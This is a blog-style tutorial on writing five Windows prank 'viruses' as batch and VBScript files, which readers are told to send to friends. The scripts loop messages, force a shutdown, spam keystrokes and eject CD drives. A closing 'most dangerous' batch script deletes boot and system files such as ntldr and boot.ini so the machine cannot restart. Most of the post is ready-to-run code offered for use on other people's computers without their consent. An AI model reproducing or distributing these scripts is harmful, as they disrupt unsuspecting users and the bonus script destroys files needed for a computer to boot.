Create Own 5 Viruses (Harmless Viruses)

Hello Friends I am Fahim Magsi Here is a brand new tutorial[TUT] on creating 5 simple viruses and bring your friends system to a stand still or something weird.
[Works only on Windows]
These are just small pranks and make sure you don’t harm while using these. Learn it just for educational purpose.
You can use any text editor other than Notepad also for these simple hacks.
Lets begin…

1.
Fire up Notepad.
Cycle a message in your friend’s computer(code is given below)
Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN


Save the file as “Anything.BAT” [without quotes of course] and send it.Try it in your own PC/Laptop/Netbook its harmless! Tongue

2.

write in notepad
Convey your friend a lil’ message and shut down his/ her computer(code is given below)
Type :
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s


Save it as “Anything.BAT” in All Files and send it.3.
Write in notepad
Toggle your friend’s Caps Lock button simultaneously(code is given below)
Type :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Anything.VBS” and send it.
4.
write in notepad
Continually pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them!(code is given below)
Type :
Set oWMP = CreateObject(“WMPlayer.OCX. 7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item( i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item( i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS” and send it.
5.
write in notepad
Frustrate your friend by making this VBScript hit Enter simultaneously(code is given below)
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save it as “Anything.VBS” and send it.
BONUS
The Most dangerous one !
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

Post a Comment

Dear Lovers Comment

Previous Post Next Post

Post Ads 1

Post Ads 2